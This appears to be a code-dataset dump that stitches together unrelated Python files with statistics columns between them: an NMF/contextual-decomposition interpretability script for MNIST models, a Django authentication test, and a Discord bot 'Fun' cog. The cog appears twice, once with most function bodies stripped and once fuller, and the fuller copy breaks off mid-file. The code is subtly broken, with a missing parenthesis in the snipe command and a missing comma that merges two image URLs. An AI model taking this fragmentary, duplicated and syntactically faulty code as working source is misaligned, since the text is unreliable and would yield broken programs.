# nmf transform
W = nmf.transform(X)
W_test = nmf.transform(X_test)
# store results
list_of_results = {
'acd': [],
'cd': []
}
for n_iter in range(nmf.n_components):
dict_indx = n_iter
model = Net2c().to(device)
model.load_state_dict(torch.load('../models/nmf/net2c_{}.pth'.format(dict_indx), map_location=device))
model = model.eval()
# knockout first dictionary and redefine train and test dataset
indx = np.argwhere(W[:,dict_indx] > 0).flatten()
indx_t = np.argwhere(W_test[:,dict_indx] > 0).flatten()
# subset dataloader
train_loader, test_loader = dset.load_data_with_indices(args.batch_size,
args.test_batch_size,
device,
subset_index=[indx, indx_t])
# nmf transform layers
nmf_transformer = transform_wrappers.TransformLayers(D).to(device)
# convert nmf weight to tensor
W_test_t = torch.Tensor(W_test).to(device)
sweep_dim = 1
tiles = torch.Tensor(tiling_2d.gen_tiles(W_test[0:1], fill=0, method='cd', sweep_dim=sweep_dim)).to(device)
# store results
results = {
'acd': [],
'cd': []
}
for batch_indx, (data, target, data_indx) in enumerate(test_loader):
# loop over nmf basis
scores_acd = []
scores_cd = []
for basis_indx in range(nmf.n_components):
im_parts = nmf_transformer(W_test_t[data_indx]*tiles[basis_indx])
scores_acd.append(acd.cd(data, model, mask=None, model_type=None, device='cuda', transform=None,
relevant=im_parts)[0].data.cpu().numpy()[:,0])
scores_cd.append(cd.cd(data, model, mask=None, model_type=None, device='cuda', transform=None,
relevant=im_parts)[0].data.cpu().numpy()[:,0])
print('\r iter, batch index: {}, {} [component index: {}]'.format(n_iter, batch_indx, basis_indx), end='')
scores_acd = np.vstack(scores_acd).T
scores_cd = np.vstack(scores_cd).T
results['acd'].append(scores_acd)
results['cd'].append(scores_cd)
list_of_results['acd'].append(np.vstack(results['acd']))
list_of_results['cd'].append(np.vstack(results['cd']))
pkl.dump(list_of_results, open('../results/cd_nmf.pkl', 'wb'))
| 33.328467 | 118 | 0.669295 | import numpy as np
import matplotlib.pyplot as plt
import torch
import random
device = 'cuda' if torch.cuda.is_available() else 'cpu'
from scipy.ndimage import gaussian_filter
import sys
from tqdm import tqdm
from functools import partial
import acd
from copy import deepcopy
sys.path.append('../..')
sys.path.append('../../..')
from transforms_torch import bandpass_filter
# plt.style.use('dark_background')
sys.path.append('../../../dsets/mnist')
import dset
from model import Net, Net2c
from util import *
from numpy.fft import *
from torch import nn
from style import *
from captum.attr import (
InputXGradient,
Saliency,
GradientShap,
DeepLift,
DeepLiftShap,
IntegratedGradients,
LayerConductance,
NeuronConductance,
NoiseTunnel,
)
import pickle as pkl
from torchvision import datasets, transforms
from sklearn.decomposition import NMF
import transform_wrappers
import visualize as viz
from model import Net, Net2c
torch.manual_seed(42)
np.random.seed(42)
from acd_wooseok.acd.scores import cd
from acd_wooseok.acd.util import tiling_2d
from acd_wooseok.acd.scores import score_funcs
from torchvision import datasets, transforms
# import modules
from funcs import *
from matfac import *
sys.path.append('../../../..')
from hierarchical_dnn_interpretations.acd.scores import cd as acd
# load args
args = dset.get_args()
args.batch_size = int(args.batch_size/2) # half the batchsize
args.epochs = 50
args.cuda = not args.no_cuda and torch.cuda.is_available()
# load mnist dataloader
train_loader, test_loader = dset.load_data_with_indices(args.batch_size, args.test_batch_size, device)
# dataset
X = train_loader.dataset.data.numpy().astype(np.float32)
X = X.reshape(X.shape[0], -1)
X /= 255
Y = train_loader.dataset.targets.numpy()
X_test = test_loader.dataset.data.numpy().astype(np.float32)
X_test = X_test.reshape(X_test.shape[0], -1)
X_test /= 255
Y_test = test_loader.dataset.targets.numpy()
# load NMF object
# run NMF
# nmf = NMF(n_components=30, max_iter=1000)
# nmf.fit(X)
# pkl.dump(nmf, open('./results/nmf_30.pkl', 'wb'))
nmf = pkl.load(open('../results/nmf_30.pkl', 'rb'))
D = nmf.components_
# nmf transform
W = nmf.transform(X)
W_test = nmf.transform(X_test)
# store results
list_of_results = {
'acd': [],
'cd': []
}
for n_iter in range(nmf.n_components):
dict_indx = n_iter
model = Net2c().to(device)
model.load_state_dict(torch.load('../models/nmf/net2c_{}.pth'.format(dict_indx), map_location=device))
model = model.eval()
# knockout first dictionary and redefine train and test dataset
indx = np.argwhere(W[:,dict_indx] > 0).flatten()
indx_t = np.argwhere(W_test[:,dict_indx] > 0).flatten()
# subset dataloader
train_loader, test_loader = dset.load_data_with_indices(args.batch_size,
args.test_batch_size,
device,
subset_index=[indx, indx_t])
# nmf transform layers
nmf_transformer = transform_wrappers.TransformLayers(D).to(device)
# convert nmf weight to tensor
W_test_t = torch.Tensor(W_test).to(device)
sweep_dim = 1
tiles = torch.Tensor(tiling_2d.gen_tiles(W_test[0:1], fill=0, method='cd', sweep_dim=sweep_dim)).to(device)
# store results
results = {
'acd': [],
'cd': []
}
for batch_indx, (data, target, data_indx) in enumerate(test_loader):
# loop over nmf basis
scores_acd = []
scores_cd = []
for basis_indx in range(nmf.n_components):
im_parts = nmf_transformer(W_test_t[data_indx]*tiles[basis_indx])
scores_acd.append(acd.cd(data, model, mask=None, model_type=None, device='cuda', transform=None,
relevant=im_parts)[0].data.cpu().numpy()[:,0])
scores_cd.append(cd.cd(data, model, mask=None, model_type=None, device='cuda', transform=None,
relevant=im_parts)[0].data.cpu().numpy()[:,0])
print('\r iter, batch index: {}, {} [component index: {}]'.format(n_iter, batch_indx, basis_indx), end='')
scores_acd = np.vstack(scores_acd).T
scores_cd = np.vstack(scores_cd).T
results['acd'].append(scores_acd)
results['cd'].append(scores_cd)
list_of_results['acd'].append(np.vstack(results['acd']))
list_of_results['cd'].append(np.vstack(results['cd']))
pkl.dump(list_of_results, open('../results/cd_nmf.pkl', 'wb'))
| 0 | 0 | 0 |
35d38aa3f568c9b1eb9c35fb859a316447af885e | 1,050 | py | Python | src/api/tests.py | cuappdev/scoop-backend | 4bfb2494598831e10bdeede2243061f7ddee1b43 | [
"MIT"
] | null | null | null | src/api/tests.py | cuappdev/scoop-backend | 4bfb2494598831e10bdeede2243061f7ddee1b43 | [
"MIT"
] | 2 | 2022-03-14T22:55:22.000Z | 2022-03-21T18:13:55.000Z | src/api/tests.py | cuappdev/rideshare-backend | 4bfb2494598831e10bdeede2243061f7ddee1b43 | [
"MIT"
] | null | null | null | import json
from django.test import TestCase
from django.urls import reverse
from rest_framework.test import APIClient
from .constants import TEST_EMAIL
from .constants import TEST_FIRSTNAME
from .constants import TEST_LASTNAME
| 27.631579 | 80 | 0.667619 | import json
from django.test import TestCase
from django.urls import reverse
from rest_framework.test import APIClient
from .constants import TEST_EMAIL
from .constants import TEST_FIRSTNAME
from .constants import TEST_LASTNAME
class TestAuthenticate(TestCase):
AUTHENTICATE_URL = reverse("authenticate")
FIRST_NAME = TEST_FIRSTNAME
LAST_NAME = TEST_LASTNAME
EMAIL = TEST_EMAIL
def setUp(self):
self.client = APIClient()
def test_create_user_and_login(
self,
first_name=FIRST_NAME,
last_name=LAST_NAME,
email=EMAIL,
):
"""Checks if user is successfully created and auth token is returned."""
data = {
"sub": "googleID",
"given_name": first_name,
"family_name": last_name,
"email": email,
}
response = self.client.post(self.AUTHENTICATE_URL, data)
self.assertEqual(response.status_code, 201)
token = json.loads(response.content)["access_token"]
self.assertIsNotNone(token)
| 29 | 767 | 23 |
6b127412effc26232fb45df404dd75fcf5cc85f7 | 25,037 | py | Python | CyberTron5000/cogs/fun.py | niztg/CyberTron5000 | 6b93305ef26e022063bffa8620b53076ba5948f7 | [
"MIT"
] | 20 | 2020-06-20T20:26:33.000Z | 2021-01-12T20:47:52.000Z | CyberTron5000/cogs/fun.py | niztg/CyberTron5000 | 6b93305ef26e022063bffa8620b53076ba5948f7 | [
"MIT"
] | 1,005 | 2020-07-09T18:27:17.000Z | 2020-07-30T20:41:33.000Z | CyberTron5000/cogs/fun.py | niztg/CyberTron5000 | 6b93305ef26e022063bffa8620b53076ba5948f7 | [
"MIT"
] | 7 | 2020-07-09T18:23:24.000Z | 2020-11-21T20:47:03.000Z | import json
import random
import string
from asyncio import TimeoutError
from datetime import datetime as dt
from io import BytesIO
from time import time
import discord
from PyDictionary import PyDictionary as dictionary
from discord.ext import commands, flags
from humanize import naturaltime as nt
from jikanpy import AioJikan
from sr_api import Client
from CyberTron5000.utils import (
paginator,
cyberformat
)
from CyberTron5000.utils.lists import (
INDICATOR_LETTERS,
ANIMALS,
EMOTIONS
)
class Fun(commands.Cog):
"""Fun commands"""
@commands.command()
async def horror(self, ctx, limit: int = 5):
"""spoopy"""
posts = []
async with self.bot.session.get(f"https://www.reddit.com/r/twosentencehorror/hot.json") as r:
res = await r.json()
for i in res['data']['children']:
posts.append(i['data'])
counter = 0
embeds = []
async with ctx.typing():
for s in random.sample(posts, len(posts)):
text = cyberformat.shorten(f"{s['title']}\n{s['selftext']}")
embeds.append(discord.Embed(description=text[:2000], colour=self.bot.colour))
counter += 1
if counter == limit:
break
else:
continue
p = paginator.CatchAllMenu(paginator.EmbedSource(embeds))
await p.start(ctx)
@commands.command()
async def pfpcycle(self, ctx):
"""if you're reading this it probably isnt your business"""
pfps = ['http://tinyurl.com/y8ccnxm3',
'https://images-ext-1.discordapp.net/external/6HjseNKji1C5wbK9Wb_jnIluzFWrCRW6xqhfboNtDDI/%3Fsize%3D1024/https/cdn.discordapp.com/avatars/350349365937700864/bbbff13a570231108b7afa383416b62a.png',
'http://tinyurl.com/ycjuvusq',
'https://cdn.discordapp.com/avatars/350349365937700864/f38bc11cf4360a9267a55962fcd71809.png?size=1024',
'https://media.discordapp.net/attachments/381963689470984203/732283634190516304/coolweavile.png?width=962&height=962',
'https://images-ext-1.discordapp.net/external/XVtT9nLyPYTWfNw4GSjvRMKibuKafi6_VCyVwSfW4C8/%3Fsize%3D1024/https/cdn.discordapp.com/avatars/350349365937700864/d027959b2a204f7587092a7a249e7377.png?width=962&height=962',
'https://media.discordapp.net/attachments/735325249138065468/735681377785348156/image0.png',
'https://media.discordapp.net/attachments/735325249138065468/735681378292596736/image1.png',
'https://media.discordapp.net/attachments/735325249138065468/735681378867478528/image2.png',
'https://media.discordapp.net/attachments/735325249138065468/735681379387441152/image3.png',
'https://media.discordapp.net/attachments/735325249138065468/735682125239681074/image0.png'
'http://i.some-random-api.ml/pokemon/weavile.png']
embeds = [discord.Embed(colour=self.bot.colour).set_image(url=p) for p in pfps]
a = paginator.CatchAllMenu(paginator.EmbedSource(embeds))
await a.start(ctx)
@commands.group(invoke_without_command=True, help="Replies with what you said and deletes your message.",
aliases=['say'])
@reply.command(invoke_without_command=True,
help="Replies with what you said and deletes your message, but in an embed.")
@reply.command(invoke_without_command=True,
help="Replies with what you said and deletes your message, but in a different channel.")
@reply.command(invoke_without_command=True, help="Replies with what you said and deletes your message, but UwU.")
@reply.command(help="🅱", invoke_without_command=True)
@reply.command(aliases=['msg'], help="Message a user something. ", invoke_without_command=True)
@reply.command(help="Spams a message.", invoke_without_command=True)
@reply.command(invoke_without_command=True, aliases=['emoji', 'em'])
async def indicator(self, ctx, *, message):
"""reply in emojis"""
msg = ''
letters = list(string.ascii_lowercase)
for x in message:
if x in letters:
msg += f':regional_indicator_{x}:'
else:
msg += INDICATOR_LETTERS.get(x, x)
await ctx.send('\u200b' + msg)
@reply.command()
async def mock(self, ctx, *, message):
"""Like that spongebob meme"""
await ctx.send(cyberformat.better_random_char(message))
@commands.command(help="Asks the mystical Ouija Board a question...")
@commands.command(aliases=['cf'], help="Flips a coin.")
@commands.command(help="How bigbrain are you? Find out.")
@commands.command(help="Ask the Bot about your peers")
@commands.group(invoke_without_command=True, aliases=["em"],
help="do an emoji from a different server that cybertron is in.")
@emoji.command()
@commands.command(aliases=['gt'])
async def greentext(self, ctx):
"""Write a greentext story"""
story = []
await ctx.send(
f"Greentext story starting! Type `{ctx.prefix}quit`, `{ctx.prefix}exit`, or `{ctx.prefix}finish` to see your final story!")
while True:
try:
msg = await self.bot.wait_for('message', timeout=300, check=lambda x: x.author == ctx.author)
if msg.content in (f'{ctx.prefix}quit', f'{ctx.prefix}exit', f'{ctx.prefix}finish'):
break
story.append(msg.content.replace('```', '\u200b'))
await msg.add_reaction(ctx.tick())
except TimeoutError:
break
story = '\n'.join([f'>{line}' for line in story])
return await ctx.send(embed=discord.Embed(colour=discord.Color.green(),
description=f"**{ctx.author}**'s story```css\n{story}\n```"))
@commands.command(aliases=['bin'])
async def binary(self, ctx, *, message):
"""Convert text to binary."""
binary = await self.sr.encode_binary(message)
await ctx.send(f"```py\n{binary}```")
@commands.command(aliases=['fb', 'from-bin'])
async def from_binary(self, ctx, *, binary):
"""Convert text from binary."""
binary = await self.sr.decode_binary(binary)
await ctx.send(binary)
@commands.command()
async def owner(self, ctx):
"""Shows you who made this bot"""
return await ctx.send(f"it is {self.bot.owner}")
@commands.command()
@commands.command(aliases=['choice'])
@commands.group(invoke_without_command=True)
async def todo(self, ctx):
"""Shows your current todo list"""
items = []
results = sorted((await self.get_all_todo(ctx.author.id)), key=lambda x: x['time'])
for each in results:
time = dt.utcfromtimestamp(each['time'])
since = nt(dt.utcnow() - time)
if each['description']:
desc_em = "❔"
else:
desc_em = ""
items.append(f"[{each['todo']}]({each['message_url']}) (ID: {each['id']} | Created {since}) {desc_em}")
source = paginator.IndexedListSource(data=items, embed=discord.Embed(colour=self.bot.colour),
title="Items (`❔` indicates that the todo has a description)", per_page=5)
menu = paginator.CatchAllMenu(source=source)
menu.add_info_fields({"❔": "Indicates that the todo has a description"})
await menu.start(ctx)
@todo.command()
async def add(self, ctx, *, todo):
"""Adds an item to your todo list"""
if len(todo) > 50:
return await ctx.send("Your todo is too long. Please be more consice.")
id = random.randint(1, 99999)
await self.bot.db.execute(
"INSERT INTO todo (todo, id, time, message_url, user_id) VALUES ($1, $2, $3, $4, $5)", todo, id, time(),
str(ctx.message.jump_url), ctx.author.id)
await ctx.send(f"{ctx.tick()} Inserted `{todo}` into your todo list! (ID: `{id}`)")
@todo.command(aliases=['rm', 'remove'])
async def resolve(self, ctx, *id: int):
"""Resolves an item from your todo list"""
items = await self.get_all_todo(ctx.author.id)
todos = [item[0] for item in items]
ids = [item[1] for item in items]
if any(item not in ids for item in id):
return await ctx.send("You passed in invalid id's!")
message = []
for i in id:
message.append(f"• {todos[ids.index(i)]}")
await self.bot.db.execute("DELETE FROM todo WHERE user_id = $1 AND id = $2", ctx.author.id, i)
await ctx.send(
f"{ctx.tick()} Deleted **{len(id)}** items from your todo list:\n" + "\n".join(message))
@todo.command()
async def list(self, ctx):
"""Shows your todo list"""
command = self.bot.get_command('todo')
await ctx.invoke(command)
@todo.command()
async def clear(self, ctx):
"""Clears all of your todos"""
num = len((await self.bot.db.fetch("SELECT * FROM todo WHERE user_id = $1", ctx.author.id)))
await self.bot.db.execute("DELETE FROM todo WHERE user_id = $1", ctx.author.id)
await ctx.send(f"{ctx.tick()} Deleted **{num}** items from your todo list!")
@todo.command(aliases=['show'])
async def info(self, ctx, id: int):
"""Shows you info on a todo"""
results = await self.bot.db.fetch("SELECT * FROM todo WHERE id = $1", id)
if not results:
raise commands.BadArgument(f'{id} is not a valid todo!')
results = results[0]
embed = discord.Embed(colour=self.bot.colour)
embed.title = f"{results['todo']} » `{results['id']}`"
time = dt.utcfromtimestamp(results['time'])
since = nt(dt.utcnow() - time)
embed.description = f'{results["description"] or ""}\n'
embed.description += f"<:clock:738186842343735387> **{since}**\n"
embed.description += f"**{time.strftime('%A %B %d, %Y at %I:%M %p')}**"
await ctx.send(embed=embed)
@todo.command(aliases=['add_desc', 'ad'])
async def describe(self, ctx, id: int, *, description):
"""Add a description for your todo"""
results = await self.bot.db.fetch("SELECT * FROM todo WHERE id = $1", id)
if not results:
raise commands.BadArgument(f'{id} is not a valid todo!')
if len(description) > 250:
return await ctx.send("That description is too long!")
await self.bot.db.execute("UPDATE todo SET description = $1 WHERE id = $2", description, id)
await ctx.send(
f"{ctx.tick()} Set todo description for `{id}` ({results[0]['todo']}) to `{description}`")
@flags.add_flag("--limit", type=int, default=500)
@flags.add_flag("--channel", type=discord.TextChannel)
@flags.command()
async def snipe(self, ctx, **flags):
"""Shows the most recently deleted messages in a given channel"""
# i know i shouldnt be using json for this
channel = flags.get('channel') or ctx.channel
with open('./json_files/snipes.json', 'r') as f:
snipes = json.load(f)
try:
channel_snipes = snipes[str(channel.id)]
except KeyError:
return await ctx.send(f"{channel} has no deleted messages.")
embeds = []
for snipe in reversed(channel_snipes[:flags.get('limit')]):
try:
author = self.bot.get_user(int(snipe['author'])) or await self.bot.fetch_user(int(snipe['author'])
img = author.avatar_url
except:
author = "Unknown User"
img = "https://media.discordapp.net/attachments/740678305237303454/866900622271971348/avvy.png"
embed = discord.Embed(colour=self.bot.colour)
desc = snipe['content']
if not desc and snipe.get('embed'):
desc = '`<Embedded Message>`'
embed.description = desc
since = dt.strptime(snipe['created_at'], '%Y-%m-%d %H:%M:%S.%f')
embed.set_author(name=f"{author} said in {str(channel)}", icon_url=img)
embed.timestamp = since
embeds.append(embed)
source = paginator.EmbedSource(embeds, footer=False)
await paginator.CatchAllMenu(source).start(ctx)
@commands.command(aliases=['af'])
async def animalfact(self, ctx, animal=None):
"""Shows a fact about an animal of your choice."""
if not animal:
return await ctx.send(
f"**Valid Animal Choices:**\ncat, dog, koala, fox, bird, elephant, panda, racoon, kangaroo, giraffe, whale")
try:
animal = str(animal).lower().replace(' ', '_')
em = ANIMALS.get(animal)
fact = await self.sr.get_fact(animal)
await ctx.send(f"{em} **Random {animal.replace('_', ' ').title()} Fact:**\n{fact}")
except Exception as error:
return await ctx.send(error)
async def get_attachement(self, image_url: str, ext='png') -> discord.File:
"""Gives you a valid image attachment of any url"""
async with self.bot.session.get(image_url) as r:
data = await r.read()
image = BytesIO(data)
return discord.File(image, filename=f'image.{ext}')
@commands.command()
async def inspiration(self, ctx):
"""Get inspired"""
async with self.bot.session.get('https://inspirobot.me/api?generate=true') as r:
data = await r.text()
file = await self.get_attachement(data)
await ctx.send(content=f"**Inspiration**", file=file)
@commands.command(aliases=['aimg'])
async def animalimg(self, ctx, *, animal=None):
"""Shows an image of an animal of your choice."""
if not animal:
return await ctx.send(
f"**Valid Animal Choices:**\ncat, dog, koala, fox, birb, red panda, panda, racoon, kangaroo")
try:
async with ctx.typing():
animal = str(animal).lower().replace(' ', '_')
image = await self.sr.get_image(animal)
file = await self.get_attachement(image.url)
await ctx.send(f"{ANIMALS.get(animal, '')} **Random {animal.replace('_', ' ').title()} Image:**",
file=file)
except Exception as error:
return await ctx.send(error)
@commands.command()
@commands.command()
@commands.command()
@commands.command()
@commands.command()
async def dog(self, ctx):
"""Shows you an image of a dog."""
async with self.bot.session.get('https://dog.ceo/api/breeds/image/random') as r, ctx.typing():
data = await r.json()
file = await self.get_attachement(data['message'])
await ctx.send(f"{ANIMALS.get('dog')} **Random Dog Image**", file=file)
@commands.group(aliases=['dictionary'], invoke_without_command=True)
async def word(self, ctx, *, word):
"""Fetch a word's definition"""
# thanks to deviljamjar for this idea
# find the original here: https://github.com/DevilJamJar/DevilBot/blob/master/cogs/utility.py/#L48-#L65
async with ctx.typing():
try:
ret = await self.bot.loop.run_in_executor(None, self._dictionary.meaning, word)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour, title=word.lower())
if not ret:
raise commands.BadArgument("this word was not found in the dictionary!")
embed.description = self.format_meanings(ret)
await ctx.send(embed=embed)
@word.command(aliases=['syn'])
async def synonyms(self, ctx, *, word):
"""Shows you the synonyms of a word."""
async with ctx.typing():
try:
ret = await self.bot.loop.run_in_executor(None, self._dictionary.synonym, word)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour, title=word.lower())
embed.description = ', '.join(ret)
await ctx.send(embed=embed)
@word.command(aliases=['ant'])
async def antonyms(self, ctx, *, word):
"""Shows you the antonyms of a word."""
async with ctx.typing():
try:
ret = await self.bot.loop.run_in_executor(None, self._dictionary.antonym, word)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour, title=word.lower())
embed.description = ', '.join(ret)
await ctx.send(embed=embed)
@word.command()
async def many(self, ctx, *words):
"""Get information on many words"""
command = self.bot.get_command('words')
await ctx.invoke(command, *words)
@commands.command()
async def words(self, ctx, *words):
"""Get information on many words"""
async with ctx.typing():
_dict = dictionary(*words)
try:
ret = await self.bot.loop.run_in_executor(None, _dict.getMeanings)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour)
embed.title = "Words"
not_found = list()
for word in words:
meanings = ret.get(word)
if not meanings:
not_found.append(word)
continue
embed.add_field(name=word.lower(), value=self.format_meanings(meanings))
if not_found:
embed.set_footer(text=', '.join(not_found) + " were not found.")
try:
await ctx.send(embed=embed)
except discord.HTTPException:
return await ctx.send("You passed in too many words!")
@commands.command()
async def ship(self, ctx, member_1: discord.Member, member_2: discord.Member):
"""Ship 2 members"""
from random import randint
rate = randint(1, 100)
await ctx.send(f"""**{member_1}** | <a:hug:748315930685210746> {rate}% :heart: | **{member_2}**""")
def setup(bot):
bot.add_cog(Fun(bot))
| 45.030576 | 232 | 0.591724 | import json
import random
import string
from asyncio import TimeoutError
from datetime import datetime as dt
from io import BytesIO
from time import time
import discord
from PyDictionary import PyDictionary as dictionary
from discord.ext import commands, flags
from humanize import naturaltime as nt
from jikanpy import AioJikan
from sr_api import Client
from CyberTron5000.utils import (
paginator,
cyberformat
)
from CyberTron5000.utils.lists import (
INDICATOR_LETTERS,
ANIMALS,
EMOTIONS
)
class Fun(commands.Cog):
"""Fun commands"""
def __init__(self, bot):
self.bot = bot
self.sr = Client()
self._dictionary = dictionary()
@commands.command()
async def horror(self, ctx, limit: int = 5):
"""spoopy"""
posts = []
async with self.bot.session.get(f"https://www.reddit.com/r/twosentencehorror/hot.json") as r:
res = await r.json()
for i in res['data']['children']:
posts.append(i['data'])
counter = 0
embeds = []
async with ctx.typing():
for s in random.sample(posts, len(posts)):
text = cyberformat.shorten(f"{s['title']}\n{s['selftext']}")
embeds.append(discord.Embed(description=text[:2000], colour=self.bot.colour))
counter += 1
if counter == limit:
break
else:
continue
p = paginator.CatchAllMenu(paginator.EmbedSource(embeds))
await p.start(ctx)
@commands.command()
async def pfpcycle(self, ctx):
"""if you're reading this it probably isnt your business"""
pfps = ['http://tinyurl.com/y8ccnxm3',
'https://images-ext-1.discordapp.net/external/6HjseNKji1C5wbK9Wb_jnIluzFWrCRW6xqhfboNtDDI/%3Fsize%3D1024/https/cdn.discordapp.com/avatars/350349365937700864/bbbff13a570231108b7afa383416b62a.png',
'http://tinyurl.com/ycjuvusq',
'https://cdn.discordapp.com/avatars/350349365937700864/f38bc11cf4360a9267a55962fcd71809.png?size=1024',
'https://media.discordapp.net/attachments/381963689470984203/732283634190516304/coolweavile.png?width=962&height=962',
'https://images-ext-1.discordapp.net/external/XVtT9nLyPYTWfNw4GSjvRMKibuKafi6_VCyVwSfW4C8/%3Fsize%3D1024/https/cdn.discordapp.com/avatars/350349365937700864/d027959b2a204f7587092a7a249e7377.png?width=962&height=962',
'https://media.discordapp.net/attachments/735325249138065468/735681377785348156/image0.png',
'https://media.discordapp.net/attachments/735325249138065468/735681378292596736/image1.png',
'https://media.discordapp.net/attachments/735325249138065468/735681378867478528/image2.png',
'https://media.discordapp.net/attachments/735325249138065468/735681379387441152/image3.png',
'https://media.discordapp.net/attachments/735325249138065468/735682125239681074/image0.png'
'http://i.some-random-api.ml/pokemon/weavile.png']
embeds = [discord.Embed(colour=self.bot.colour).set_image(url=p) for p in pfps]
a = paginator.CatchAllMenu(paginator.EmbedSource(embeds))
await a.start(ctx)
@commands.group(invoke_without_command=True, help="Replies with what you said and deletes your message.",
aliases=['say'])
async def reply(self, ctx, *, message):
await ctx.send(message)
@reply.command(invoke_without_command=True,
help="Replies with what you said and deletes your message, but in an embed.")
async def embed(self, ctx, *, message):
await ctx.send(embed=discord.Embed(title=message, colour=self.bot.colour))
@reply.command(invoke_without_command=True,
help="Replies with what you said and deletes your message, but in a different channel.")
async def echo(self, ctx, channel: discord.TextChannel, *, message):
await channel.send(message)
await ctx.message.add_reaction(emoji=ctx.tick())
@reply.command(invoke_without_command=True, help="Replies with what you said and deletes your message, but UwU.")
async def owo(self, ctx, *, message):
await ctx.send(cyberformat.hyper_replace(text=message, old=['r', 'l', 'R', 'L'], new=['w', 'w', "W", "W"]))
@reply.command(help="🅱", invoke_without_command=True)
async def b(self, ctx, *, message):
await ctx.send(cyberformat.hyper_replace(text=message, old=['b', 'B', 'D', 'd'], new=['🅱', '🅱', "🅱", "🅱"]))
@reply.command(aliases=['msg'], help="Message a user something. ", invoke_without_command=True)
async def message(self, ctx, user: discord.Member, *, message):
person = self.bot.get_user(user.id)
await person.send(f"{message}\n\n*(Sent by {ctx.message.author})*")
await ctx.message.add_reaction(emoji=ctx.tick())
@reply.command(help="Spams a message.", invoke_without_command=True)
async def spam(self, ctx, *, message):
await ctx.send(f"{message} " * 15)
@reply.command(invoke_without_command=True, aliases=['emoji', 'em'])
async def indicator(self, ctx, *, message):
"""reply in emojis"""
msg = ''
letters = list(string.ascii_lowercase)
for x in message:
if x in letters:
msg += f':regional_indicator_{x}:'
else:
msg += INDICATOR_LETTERS.get(x, x)
await ctx.send('\u200b' + msg)
@reply.command()
async def mock(self, ctx, *, message):
"""Like that spongebob meme"""
await ctx.send(cyberformat.better_random_char(message))
@commands.command(help="Asks the mystical Ouija Board a question...")
async def askouija(self, ctx, *, question):
ouija_responses = [
'Help',
'Bruh',
'dumb',
'You dumb',
'Hey gamers'
'Infinity',
'God damn ur ugly',
'Gamers',
'Gamers Unite',
'Fricken amateur',
'Fricken doofus',
'Yo',
'Joe mama',
'No',
'yes',
'perhaps',
'Waluigi',
'Bruh Moment',
'Moment of the Bruh',
'Puh-leaze',
'Vibe Check']
ouija_choice = random.choice(ouija_responses)
ouija_says = str("You asked me... '_{}_'... I respond... {}".format(question, ouija_choice))
await ctx.send(ouija_says)
@commands.command(aliases=['cf'], help="Flips a coin.")
async def coinflip(self, ctx, *, clause: str = None):
tails = discord.Embed(title="Tails!", colour=self.bot.colour).set_image(
url='https://upload.wikimedia.org/wikipedia/en/thumb/3/37/Quarter_Reverse_2010.png/220px-Quarter_Reverse_2010.png')
heads = discord.Embed(title="Heads!", colour=self.bot.colour).set_image(
url='https://upload.wikimedia.org/wikipedia/en/thumb/8/8a/Quarter_Obverse_2010.png/220px-Quarter_Obverse_2010.png')
embed = random.choice([heads, tails])
embed.set_author(name=clause, icon_url=ctx.author.avatar_url) if clause else None
await ctx.send(embed=embed)
@commands.command(help="How bigbrain are you? Find out.")
async def iq(self, ctx, *, member: discord.Member = None):
member = member or ctx.message.author
embed = discord.Embed(
colour=self.bot.colour, title='IQ Rating Machine <:bigbrain:703735142509969408>',
timestamp=ctx.message.created_at
)
embed.set_author(name="{}".format(member.display_name), icon_url=member.avatar_url)
embed.add_field(name="What is your IQ?",
value=f"{member.display_name} has an IQ of {random.randint(1, 101)}.")
await ctx.send(embed=embed)
@commands.command(help="Ask the Bot about your peers")
async def who(self, ctx, *, question=None):
member = random.choice(ctx.guild.members)
embed = discord.Embed(
colour=self.bot.colour,
title=f"Answer: {member.display_name}",
)
question = question or "?"
embed.set_author(name="Who " + question)
embed.set_image(url=member.avatar_url)
await ctx.send(embed=embed)
@commands.group(invoke_without_command=True, aliases=["em"],
help="do an emoji from a different server that cybertron is in.")
async def emoji(self, ctx, *emoji: discord.Emoji):
a = []
for item in emoji:
a.append(self.bot.get_emoji(item.id))
await ctx.send("".join([str(a) for a in a]))
@emoji.command()
async def url(self, ctx, *emoji: discord.Emoji):
a = []
for item in emoji:
a.append(self.bot.get_emoji(item.id))
await ctx.send(" ".join([str(a.url) for a in a]))
@commands.command(aliases=['gt'])
async def greentext(self, ctx):
"""Write a greentext story"""
story = []
await ctx.send(
f"Greentext story starting! Type `{ctx.prefix}quit`, `{ctx.prefix}exit`, or `{ctx.prefix}finish` to see your final story!")
while True:
try:
msg = await self.bot.wait_for('message', timeout=300, check=lambda x: x.author == ctx.author)
if msg.content in (f'{ctx.prefix}quit', f'{ctx.prefix}exit', f'{ctx.prefix}finish'):
break
story.append(msg.content.replace('```', '\u200b'))
await msg.add_reaction(ctx.tick())
except TimeoutError:
break
story = '\n'.join([f'>{line}' for line in story])
return await ctx.send(embed=discord.Embed(colour=discord.Color.green(),
description=f"**{ctx.author}**'s story```css\n{story}\n```"))
@commands.command(aliases=['bin'])
async def binary(self, ctx, *, message):
"""Convert text to binary."""
binary = await self.sr.encode_binary(message)
await ctx.send(f"```py\n{binary}```")
@commands.command(aliases=['fb', 'from-bin'])
async def from_binary(self, ctx, *, binary):
"""Convert text from binary."""
binary = await self.sr.decode_binary(binary)
await ctx.send(binary)
@commands.command()
async def owner(self, ctx):
"""Shows you who made this bot"""
return await ctx.send(f"it is {self.bot.owner}")
@commands.command()
async def anime(self, ctx, *, query):
async with AioJikan() as a:
naruto = await a.search(search_type='anime', query=query)
res = naruto['results'][0]
o = []
embed = discord.Embed(color=self.bot.colour)
embed.set_thumbnail(url=res['image_url'])
embed.title = f"{res['title']}"
embed.url = f"{res['url']}"
embed.description = f"{naruto['results'][0]['synopsis']}"
embed.add_field(name="Info",
value=f"Type | **{res['type']}**\n📺 | **{res['episodes']}**\n:star:️ | **{res['score']}**\n<:member:731190477927219231> | **{res['members']:,}**")
for x in range(2, len(naruto['results'])):
o.append(f"**{naruto['results'][x]['title']}**")
embed.add_field(name="Other Entries", value=f"\n".join(o[:5]))
await ctx.send(embed=embed)
@commands.command(aliases=['choice'])
async def chose(self, ctx, *choices):
await ctx.send(random.choice(choices))
async def get_all_todo(self, id: int = None):
if not id:
return await self.bot.db.fetch("SELECT * FROM todo")
else:
return await self.bot.db.fetch("SELECT * FROM todo WHERE user_id = $1", id)
@commands.group(invoke_without_command=True)
async def todo(self, ctx):
"""Shows your current todo list"""
